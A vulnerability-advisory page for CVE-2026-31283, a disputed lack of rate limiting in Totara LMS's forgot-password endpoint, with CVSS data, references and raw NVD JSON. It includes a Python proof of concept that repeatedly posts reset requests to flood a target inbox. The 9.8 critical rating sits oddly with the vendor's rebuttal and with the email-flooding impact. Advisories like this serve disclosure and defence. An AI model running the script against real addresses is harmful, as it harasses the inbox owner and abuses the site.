CVE-2026-31283

Description

In Totara LMS v19.1.5 and before, the forgot password API does not implement rate limiting for the target email address. which can be used for an Email Bombing attack. NOTE: the Supplier's position is that the pwresettime configuration defaults to 30 minutes, the pwresettime configuration is a hard control enforced via flag PWRESET_STATUS_ALREADYSENT, and no further password-reset email messages are sent if this flag is active for a specific email address.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Totara LMS <= 19.1.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import time def send_password_reset(target_email, url): """ PoC for CVE-2026-31283: Email Bombing via Forgot Password API """ headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } # Payload structure may vary based on Totara configuration payload = { "email": target_email, "submit": "Send+password+reset+link" } try: response = requests.post(url, data=payload, headers=headers) if response.status_code == 200: print(f"[+] Email sent successfully to {target_email}") else: print(f"[-] Failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target = "[email protected]" # Replace with the actual endpoint of the target Totara instance target_url = "https://target-totara-site.com/login/forgot_password.php" print(f"[*] Starting Email Bombing attack on {target}...") for i in range(100): send_password_reset(target, target_url) time.sleep(1) # Optional delay to avoid immediate network timeouts print("[*] Attack finished.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31283
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31283
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31283/
[4] VulDB https://vuldb.com/cve/CVE-2026-31283
[5] https://github.com/saykino/CVE-2026-31283
[6] https://totara.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31283", "sourceIdentifier": "[email protected]", "published": "2026-04-13T15:17:33.220", "lastModified": "2026-04-24T08:16:29.853", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "In Totara LMS v19.1.5 and before, the forgot password API does not implement rate limiting for the target email address. which can be used for an Email Bombing attack. NOTE: the Supplier's position is that the pwresettime configuration defaults to 30 minutes, the pwresettime configuration is a hard control enforced via flag PWRESET_STATUS_ALREADYSENT, and no further password-reset email messages are sent if this flag is active for a specific email address."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://github.com/saykino/CVE-2026-31283", "source": "[email protected]"}, {"url": "https://totara.com/", "source": "[email protected]"}]}}